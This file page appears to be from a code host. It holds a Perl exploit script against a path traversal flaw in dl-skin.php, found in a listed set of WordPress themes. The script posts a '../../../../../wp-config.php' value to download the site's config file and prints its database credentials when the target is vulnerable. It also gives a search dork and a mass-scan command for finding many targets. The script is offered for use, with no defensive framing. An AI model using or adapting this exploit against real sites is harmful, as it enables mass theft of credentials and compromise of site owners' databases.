-
Notifications
You must be signed in to change notification settings - Fork 0
/
WP-dl-skin-exploit.pl
67 lines (65 loc) · 2.49 KB
/
WP-dl-skin-exploit.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/perl
############################################
############################################
## WORDPRESS AFD dl-skin.php Exploit
## CODED BY ALI MEHDIOUI
## ALISAM TECHNOLOGY TEAM
############################################
## VULNERABLE THEMES:
## wp-content/themes/awake/
## wp-content/themes/elegance/
## wp-content/themes/barracudafx/
## wp-content/themes/fusion/
## wp-content/themes/dejavu/
## wp-content/themes/infocus/
## wp-content/themes/Minamaze_Pro/
## wp-content/themes/Melos_Pro/
## wp-content/themes/versatile/
## wp-content/themes/construct/
## wp-content/themes/persuasion/
## wp-content/themes/mesocolumn/
## [+][+]
## USAGE:
## perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php
## [+][+]
## ATSCAN MASS USAGE:
## atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET"
## DORKS
## DORK: index of /lib/scripts/dl-skin.php
############################################
############################################
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
print color 'reset';
print "
[+]================================================================[+]
[+]--------- Wordpress AFD timthumb-config.php Exploit -----------[+]
[+]-------------- Alisam Technology --------------[+]
[+]------ https://www.fb.com/Forces.des.tempetes.marocaines ------[+]
[+]------ https://www.youtube.com/user/aliartes ------[+]
[+]================================================================[+]
";
if (!$ARGV[0]) { print "Usage: php WP-dl-skin.php-exploit.php http://www.site.com/wp-content/themes/THEME NAME/....\n"; exit; }
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $URL=$ARGV[0];
my @error=("Target Vulnerable", "Target Not vulnerable");
$URL=~s/scripts\/(.*)//s;
$URL=$URL."scripts/dl-skin.php";
print " SCAN : ";
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
my $response=$ua->request(POST $URL, ['Content_Type' => 'form-data', '_mysite_download_skin' => '../../../../../wp-config.php']);
if ($response->content=~/DB_NAME/) {
print color 'green'; print "$error[0]\n";
print color 'green'; print $response->content."\n";
print color 'reset';
}else{
print color 'red'; print "$error[1]\n";
print color 'reset';
}